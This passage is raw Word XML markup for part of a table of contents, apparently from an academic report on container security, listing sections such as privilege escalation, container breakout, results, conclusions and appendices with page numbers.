              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="532B873F" w14:textId="415777AC"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37" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Privilege Escalation Attack</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_Toc87032937 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47F04D8F" w14:textId="5D96E61D"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38" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Container breakout</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_Toc87032938 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68DC4056" w14:textId="38473048"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39" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.3</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Vulnerable Application</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_Toc87032939 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="649D17D4" w14:textId="62DA4969"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40" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</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_Toc87032940 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79A81221" w14:textId="6B175280" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032941" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 7</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - RESULTS AND DISCUSSIONS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_Toc87032941 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FCC6E54" w14:textId="152A11CE"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42" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</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_Toc87032942 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20B16D8D" w14:textId="609852C4"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43" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1 RESULTS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_Toc87032943 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51C47650" w14:textId="6B1DA697"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44" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2 DISCUSSIONS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_Toc87032944 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78FBCED3" w14:textId="61A42C69"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45" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3 WHO CAN BENEFIT?</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_Toc87032945 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F3A66D7" w14:textId="1900EB57"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46" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</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_Toc87032946 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E883F6A" w14:textId="4F2F87B9" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032947" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 8</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - CONCLUSIONS AND RECOMMENDATIONS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_Toc87032947 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BF5A258" w14:textId="1121C4D4"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48" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</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_Toc87032948 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5961E5D4" w14:textId="0F6ACF55"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49" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1 SUMMARY</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_Toc87032949 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BBAEA62" w14:textId="3E683948"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50" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2 CONCLUSION</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_Toc87032950 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CBE6872" w14:textId="7510060F"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51" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3 RECOMMENDATIONS FOR FURTHER RESEARCH</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_Toc87032951 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FB9DC1E" w14:textId="3E55BD17" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032952" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 9</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> – REFLECTIONS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_Toc87032952 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="783E4ABB" w14:textId="03A4D68F" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032953" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 10</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> REFERENCES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_Toc87032953 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08C5CDFD" w14:textId="4AF0A223" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032954" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDICES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_Toc87032954 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
